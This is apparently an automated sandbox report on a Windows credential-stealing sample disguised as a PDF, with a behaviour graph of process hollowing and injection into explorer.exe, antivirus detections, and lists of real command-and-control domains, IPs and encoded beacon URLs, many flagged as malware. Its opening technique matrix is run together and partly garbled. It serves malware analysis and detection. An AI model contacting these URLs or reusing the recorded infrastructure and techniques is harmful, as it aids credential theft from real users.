          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
          Software Packing          		Security Account Manager15
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration5
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading          		NTDS141
          Security Software Discovery          		Distributed Component Object Model1
          Input Capture          		Scheduled Transfer15
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Virtualization/Sandbox Evasion          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSH1
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items512
          Process Injection          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Rundll32          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 837869 Sample: TTCopy-240323-PDF.exe Startdate: 30/03/2023 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 3 other signatures 2->41 9 TTCopy-240323-PDF.exe 19 2->9         started        process3 file4 27 C:\Users\user\AppData\Local\Temp\gkvlc.exe, PE32 9->27 dropped 12 gkvlc.exe 1 9->12         started        process5 signatures6 53 Multi AV Scanner detection for dropped file 12->53 55 Detected unpacking (changes PE section rights) 12->55 57 Maps a DLL or memory area into another process 12->57 15 gkvlc.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 20 explorer.exe 5 6 15->20 injected process9 dnsIp10 29 www.no-leaks.com 156.226.207.81, 49717, 49718, 49719 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 20->29 31 eylien.com 81.169.145.66, 49744, 49745, 49746 STRATOSTRATOAGDE Germany 20->31 33 21 other IPs or domains 20->33 43 System process connects to network (likely due to code injection or exploit) 20->43 24 rundll32.exe 13 20->24         started        signatures11 process12 signatures13 45 Tries to steal Mail credentials (via file / registry access) 24->45 47 Tries to harvest and steal browser information (history, passwords, etc) 24->47 49 Modifies the context of a thread in another process (thread injection) 24->49 51 Maps a DLL or memory area into another process 24->51

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TTCopy-240323-PDF.exe70%ReversingLabsWin32.Trojan.Nsisx
          TTCopy-240323-PDF.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\gkvlc.exe75%ReversingLabsWin32.Trojan.NSISInject

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.gkvlc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.gkvlc.exe.710000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.tricoshipping.de/register/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/plugins/cookie-notice/css/front.css?ver=4.4.20%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/themes/hueman/js/jquery.flexslider.min.js?ver=4.4.20%Avira URL Cloudsafe
          http://www.tricoshipping.de/rates/sea-air-services-to-other-countries/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/themes/hueman/3dcarousel.css0%Avira URL Cloudsafe
          http://www.tricoworld.com/cargo-tracking.php0%Avira URL Cloudsafe
          http://www.tricoshipping.de/the-best-vpn-meant-for-android/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/themes/hueman/js/3dcarousel.js0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/plugins/responsive-accordion-and-collapse/css/bootstrap-front0%Avira URL Cloudsafe
          http://www.tricoshipping.de/determing-the-best-document-management-computer-software/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/plugins/custom-registration-form-builder-with-submission-mana0%Avira URL Cloudsafe
          http://www.tricoshipping.de/services/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/ideal-data-room-review-what-you-need-to-know/0%Avira URL Cloudsafe
          http://www.tricofreight.co.uk/wp-content/uploads/2016/01/trico_logo-2.jpg0%Avira URL Cloudsafe
          http://www.laksiricargo.com/qsni/?C6=6t2Q7SeAwLmQNelBXDLKo9qpSU1icepMxITYi6227y8BkUMVt16o9uBaj3iomGvWgYEbJgVfO4tURjyhVEwFkTJljUaU+RSQoO9JU52yJaZ7&ZOm=dXna0d100%Avira URL Cloudmalware
          http://www.tricoshipping.de/wp-includes/js/jquery/jquery.js?ver=1.11.30%Avira URL Cloudsafe
          http://www.tricoshipping.de/ant-virus-for-free-what-you-need-to-know/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.10%Avira URL Cloudsafe
          http://bbs.safedog.cn/thread-60693-1-1.html?from=stat0%Avira URL Cloudsafe
          http://404.safedog.cn/images/safedogsite/head.png0%Avira URL Cloudsafe
          http://www.smirnovmir.online/qsni/100%Avira URL Cloudmalware
          http://www.dzyngiri.com0%Avira URL Cloudsafe
          http://www.coolconnect.online/qsni/100%Avira URL Cloudmalware
          http://www.tricoshipping.de/rates/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/themes/hueman/js/craftmap.js0%Avira URL Cloudsafe
          http://www.tricoshipping.de/help-faq/0%Avira URL Cloudsafe
          http://www.studioweiden.click/qsni/?ZOm=dXna0d&C6=26sVYQdWyPHrLcN8MdbUKtu6rE5mK0DGN1OetThfHCln6c5Rbo6sl7lf7GeT2I5yOzNBygfgGXS7QAdgzJGeV3dtWL+OEoULXVdsrh2vXHGa100%Avira URL Cloudmalware
          http://www.lozpw.space/qsni/?C6=7+/pa7cMIZb54wjm1RsZvtFfNVB8Z/QdqaMN0Z3PMdssi3LToC7r01OcckC1KOCTsbG7Wxv/cdrmK2w8C8oi13hsN9vphDqPYEofN51tqDkO&ZOm=dXna0d100%Avira URL Cloudmalware
          http://www.tricoshipping.de/cookie-policy/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/contact-us/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/feed/0%Avira URL Cloudsafe
          http://www.paystiky.site/qsni/100%Avira URL Cloudmalware
          http://www.tricoshipping.de/xmlrpc.php0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-login.php?action=lostpassword0%Avira URL Cloudsafe
          http://www.goosedigitals.com/qsni/?ZOm=dXna0d&C6=oPyrfRlE7jGprydIcpn1uLxu0uVPdhQD6EOIZ3ubbXdpkE4rDM9lUBPa/Wg1MhL6NFOsyrI8+tVoLFRpvfeXwUES31gxAIydNpG03eX3gAqa0%Avira URL Cloudsafe
          http://www.no-leaks.com/qsni/?ZOm=dXna0d&C6=20xhMWbp2rhGgEBmOnN/yuEbcH426mhGgRtw9KpGIAL9OE+0hkYwLlKlZ9z7J35lfOa8jhk9Snj95+wj7juHJ9vXTEnViFsBbwnkbfnQvm3P100%Avira URL Cloudmalware
          https://www.domainnameshop.com/whois?currency=SEK&lang=sv0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/plugins/login-with-ajax/widget/login-with-ajax.js?ver=3.1.50%Avira URL Cloudsafe
          http://www.tricoshipping.de/0%Avira URL Cloudsafe
          http://www.hexiemoju.com/qsni/0%Avira URL Cloudsafe
          http://www.safedog.cn0%Avira URL Cloudsafe
          http://www.tricoshipping.de/what-to-look-for-in-a-digital-data-room/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/themes/hueman/fonts/font-awesome.min.css?ver=4.4.20%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/themes/hueman/js/ie/selectivizr.js0%Avira URL Cloudsafe
          http://thedivinerudraksha.com/qsni/?C6=S6oNdn2CISfbyQQSFOkbdML8TX/gNb7zOhc0ncpUr4ThSa27AwSs7NRYXuu6r100%Avira URL Cloudmalware
          http://www.tricoshipping.de/wp-content/plugins/cookie-notice/js/front.js?ver=1.2.340%Avira URL Cloudsafe
          http://www.tricoshipping.de/xmlrpc.php?rsd0%Avira URL Cloudsafe
          http://www.tricoshipping.de/comments/feed/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/services/air/0%Avira URL Cloudsafe
          http://www.solscape.org/qsni/100%Avira URL Cloudmalware
          http://www.tricoshipping.de/wp-content/plugins/ditty-news-ticker/assets/fontastic/styles.css?ver=2.00%Avira URL Cloudsafe
          http://www.deconsurveys.com/qsni/?C6=sjDLJDaVFikbBLWeMZWSwu5CnHyJDqPqbcjbdnlFjtv6c2l5GqNUNqEWLibW6hm2WPlpLlzvFm1TmHWnlQdAoValOlOqTFFHZz0t1yDYUjQx&ZOm=dXna0d0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-includes/js/wp-embed.min.js?ver=4.4.20%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/plugins/ditty-news-ticker/assets/js/jquery.easing.1.3.js?ver=0%Avira URL Cloudsafe
          http://www.deconsurveys.com/qsni/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/plugins/responsive-tabs/js/rtbs.js?ver=4.4.20%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/themes/hueman/style.css?ver=4.4.20%Avira URL Cloudsafe
          http://www.dammar.net/qsni/100%Avira URL Cloudmalware
          http://www.thedivinerudraksha.com/qsni/?C6=S6oNdn2CISfbyQQSFOkbdML8TX/gNb7zOhc0ncpUr4ThSa27AwSs7NRYXuu6rvDZZ5M5qPLQzIJSvpL/eoGGUOPSfzmcqKmyyuwcLPwrUmgH&ZOm=dXna0d100%Avira URL Cloudmalware
          http://www.tricoshipping.de/wp-content/themes/hueman/img/partner_dhl_logo.jpg0%Avira URL Cloudsafe
          http://www.hexiemoju.com/qsni/?C6=p8pgVrFU0KaM67LkG2/HXLDeB7IL2n51le4JMrfTj7FohhyzYrH8fXmJIvaeotiFFl2VJ/RpY5m/lS8/GyXuRg8EnyJC/Fp8bjDJ/ib+v4lR&ZOm=dXna0d0%Avira URL Cloudsafe
          http://www.tricoshipping.de/payments/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/services/quotation/0%Avira URL Cloudsafe
          http://www.goosedigitals.com/qsni/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/rates/sri-lanka-freight-cost/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/plugins/responsive-accordion-and-collapse/js/bootstrap.js?ver0%Avira URL Cloudsafe
          http://www.pgatraining.com/qsni/100%Avira URL Cloudmalware
          http://www.tricoshipping.de/packing-cases/0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/plugins/ditty-news-ticker/assets/css/style.css?ver=2.0.50%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/themes/hueman/img/partner_trico.jpg0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/themes/hueman/js/scripts.js?ver=4.4.20%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-content/plugins/responsive-accordion-and-collapse/js/accordion.js?ver0%Avira URL Cloudsafe
          http://www.tricoshipping.de/impressum/0%Avira URL Cloudsafe
          http://www.pgatraining.com/qsni/?C6=ylLL100%Avira URL Cloudmalware
          http://justinmezzell.com0%Avira URL Cloudsafe
          http://www.no-leaks.com/qsni/100%Avira URL Cloudmalware
          http://www.tricoshipping.de/wp-content/plugins/responsive-accordion-and-collapse/css/font-awesome/cs0%Avira URL Cloudsafe
          http://www.tricoshipping.de/wp-json/0%Avira URL Cloudsafe
          http://www.smirnovmir.online/qsni/?ZOm=dXna0d&C6=FgfvfbKMco1hm4BTaSRmeVKlkqqq28/f/j0nkdrPBpFMczuiiIeBX6QaoIVtcG6Y6TumCsRXLbRUzhWAbp/pDAVUj4gCTuO332taxWtVavyG100%Avira URL Cloudmalware
          http://www.tricoshipping.de/agb/0%Avira URL Cloudsafe
          http://www.dammar.net/qsni/?C6=/CUbeLGdGW7zl6Yrg3szV70J26SXMoQ2pfYL+bcx2mg0PIzThOL5knKcXzWm1tDlAVZWmNl686ZiGeZ8WLzQG28uiNuGoArcmZEyTk8QSRXO&ZOm=dXna0d100%Avira URL Cloudmalware
          http://www.tricoshipping.de/services/sea/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.no-leaks.com
          		156.226.207.81
          		truetrue
            		unknown
            www.smirnovmir.online
            		194.58.112.174
            		truetrue
              		unknown
              deconsurveys.com
              		145.239.252.49
              		truetrue
                		unknown
                www.studioweiden.click
                		45.136.196.215
                		truetrue
                  		unknown
                  eylien.com
                  		81.169.145.66
                  		truetrue
                    		unknown
                    www.pgatraining.com
                    		81.17.29.150
                    		truetrue
                      		unknown
                      www.lozpw.space
                      		173.199.124.126
                      		truetrue
                        		unknown
                        dammar.net
                        		199.231.66.204
                        		truetrue
                          		unknown
                          www.solscape.org
                          		91.195.240.94
                          		truetrue
                            		unknown
                            www.paystiky.site
                            		199.192.30.147
                            		truetrue
                              		unknown
                              thedivinerudraksha.com
                              		85.187.128.34
                              		truetrue
                                		unknown
                                www.coolconnect.online
                                		185.134.245.113
                                		truetrue
                                  		unknown
                                  www.laksiricargo.com
                                  		217.160.0.81
                                  		truetrue
                                    		unknown
                                    wellblech.shop
                                    		81.169.145.72
                                    		truetrue
                                      		unknown
                                      www.hexiemoju.com
                                      		69.172.75.142
                                      		truetrue
                                        		unknown
                                        goosedigitals.com
                                        		45.32.200.254
                                        		truetrue
                                          		unknown
                                          www.dammar.net
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.wellblech.shop
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.deconsurveys.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.goosedigitals.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.thedivinerudraksha.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.eylien.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.laksiricargo.com/qsni/?C6=6t2Q7SeAwLmQNelBXDLKo9qpSU1icepMxITYi6227y8BkUMVt16o9uBaj3iomGvWgYEbJgVfO4tURjyhVEwFkTJljUaU+RSQoO9JU52yJaZ7&ZOm=dXna0dtrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.smirnovmir.online/qsni/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.coolconnect.online/qsni/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.studioweiden.click/qsni/?ZOm=dXna0d&C6=26sVYQdWyPHrLcN8MdbUKtu6rE5mK0DGN1OetThfHCln6c5Rbo6sl7lf7GeT2I5yOzNBygfgGXS7QAdgzJGeV3dtWL+OEoULXVdsrh2vXHGatrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.lozpw.space/qsni/?C6=7+/pa7cMIZb54wjm1RsZvtFfNVB8Z/QdqaMN0Z3PMdssi3LToC7r01OcckC1KOCTsbG7Wxv/cdrmK2w8C8oi13hsN9vphDqPYEofN51tqDkO&ZOm=dXna0dtrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.goosedigitals.com/qsni/?ZOm=dXna0d&C6=oPyrfRlE7jGprydIcpn1uLxu0uVPdhQD6EOIZ3ubbXdpkE4rDM9lUBPa/Wg1MhL6NFOsyrI8+tVoLFRpvfeXwUES31gxAIydNpG03eX3gAqatrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.paystiky.site/qsni/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.no-leaks.com/qsni/?ZOm=dXna0d&C6=20xhMWbp2rhGgEBmOnN/yuEbcH426mhGgRtw9KpGIAL9OE+0hkYwLlKlZ9z7J35lfOa8jhk9Snj95+wj7juHJ9vXTEnViFsBbwnkbfnQvm3Ptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.hexiemoju.com/qsni/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.deconsurveys.com/qsni/?C6=sjDLJDaVFikbBLWeMZWSwu5CnHyJDqPqbcjbdnlFjtv6c2l5GqNUNqEWLibW6hm2WPlpLlzvFm1TmHWnlQdAoValOlOqTFFHZz0t1yDYUjQx&ZOm=dXna0dtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.solscape.org/qsni/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.deconsurveys.com/qsni/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dammar.net/qsni/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.thedivinerudraksha.com/qsni/?C6=S6oNdn2CISfbyQQSFOkbdML8TX/gNb7zOhc0ncpUr4ThSa27AwSs7NRYXuu6rvDZZ5M5qPLQzIJSvpL/eoGGUOPSfzmcqKmyyuwcLPwrUmgH&ZOm=dXna0dtrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.hexiemoju.com/qsni/?C6=p8pgVrFU0KaM67LkG2/HXLDeB7IL2n51le4JMrfTj7FohhyzYrH8fXmJIvaeotiFFl2VJ/RpY5m/lS8/GyXuRg8EnyJC/Fp8bjDJ/ib+v4lR&ZOm=dXna0dtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.goosedigitals.com/qsni/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.pgatraining.com/qsni/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.no-leaks.com/qsni/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.smirnovmir.online/qsni/?ZOm=dXna0d&C6=FgfvfbKMco1hm4BTaSRmeVKlkqqq28/f/j0nkdrPBpFMczuiiIeBX6QaoIVtcG6Y6TumCsRXLbRUzhWAbp/pDAVUj4gCTuO332taxWtVavyGtrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.dammar.net/qsni/?C6=/CUbeLGdGW7zl6Yrg3szV70J26SXMoQ2pfYL+bcx2mg0PIzThOL5knKcXzWm1tDlAVZWmNl686ZiGeZ8WLzQG28uiNuGoArcmZEyTk8QSRXO&ZOm=dXna0dtrue
                                                      • Avira URL Cloud: malware
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtab3_45586pY.14.drfalse
                                                        		high
                                                        http://www.tricoshipping.de/wp-content/themes/hueman/3dcarousel.cssrundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://duckduckgo.com/ac/?q=3_45586pY.14.drfalse
                                                          		high
                                                          https://reg.rurundll32.exe, 0000000E.00000002.778641956.00000000061AE000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            http://www.tricoshipping.de/wp-content/themes/hueman/js/jquery.flexslider.min.js?ver=4.4.2rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/register/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://bbs.safedog.cn/thread-60693-1-1.html?from=statrundll32.exe, 0000000E.00000002.778641956.0000000006664000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000E.00000002.779281568.00000000070B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/the-best-vpn-meant-for-android/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/wp-content/themes/hueman/js/3dcarousel.jsrundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/wp-content/plugins/responsive-accordion-and-collapse/css/bootstrap-frontrundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoworld.com/cargo-tracking.phprundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/wp-content/plugins/cookie-notice/css/front.css?ver=4.4.2rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/rates/sea-air-services-to-other-countries/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricofreight.co.uk/wp-content/uploads/2016/01/trico_logo-2.jpgrundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/wp-content/plugins/custom-registration-form-builder-with-submission-manarundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://404.safedog.cn/images/safedogsite/head.pngrundll32.exe, 0000000E.00000002.778641956.0000000006664000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000E.00000002.779281568.00000000070B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.dzyngiri.comrundll32.exe, 0000000E.00000002.778641956.0000000005842000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/determing-the-best-document-management-computer-software/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/services/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/ideal-data-room-review-what-you-need-to-know/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/wp-includes/js/jquery/jquery.js?ver=1.11.3rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/ant-virus-for-free-what-you-need-to-know/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/rates/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/wp-content/themes/hueman/js/craftmap.jsrundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/help-faq/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/cookie-policy/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/wp-login.php?action=lostpasswordrundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/xmlrpc.phprundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/contact-us/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tricoshipping.de/feed/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://parking.reg.ru/script/get_domain_data?domain_name=www.smirnovmir.online&rand=rundll32.exe, 0000000E.00000002.778641956.00000000061AE000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://www.domainnameshop.com/whois?currency=SEK&lang=svrundll32.exe, 0000000E.00000002.778641956.00000000059D4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.tricoshipping.de/wp-content/plugins/login-with-ajax/widget/login-with-ajax.js?ver=3.1.5rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.tricoshipping.de/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.tricoshipping.de/what-to-look-for-in-a-digital-data-room/rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.safedog.cnrundll32.exe, 0000000E.00000002.778641956.0000000006664000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000E.00000002.779281568.00000000070B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=3_45586pY.14.drfalse
                                                                		high
                                                                http://thedivinerudraksha.com/qsni/?C6=S6oNdn2CISfbyQQSFOkbdML8TX/gNb7zOhc0ncpUr4ThSa27AwSs7NRYXuu6rrundll32.exe, 0000000E.00000002.778641956.0000000005CF8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://www.tricoshipping.de/wp-content/plugins/cookie-notice/js/front.js?ver=1.2.34rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://nsis.sf.net/NSIS_ErrorErrorTTCopy-240323-PDF.exefalse
                                                                  		high
                                                                  http://www.tricoshipping.de/wp-content/themes/hueman/js/ie/selectivizr.jsrundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.tricoshipping.de/wp-content/themes/hueman/fonts/font-awesome.min.css?ver=4.4.2rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.tricoshipping.de/xmlrpc.php?rsdrundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
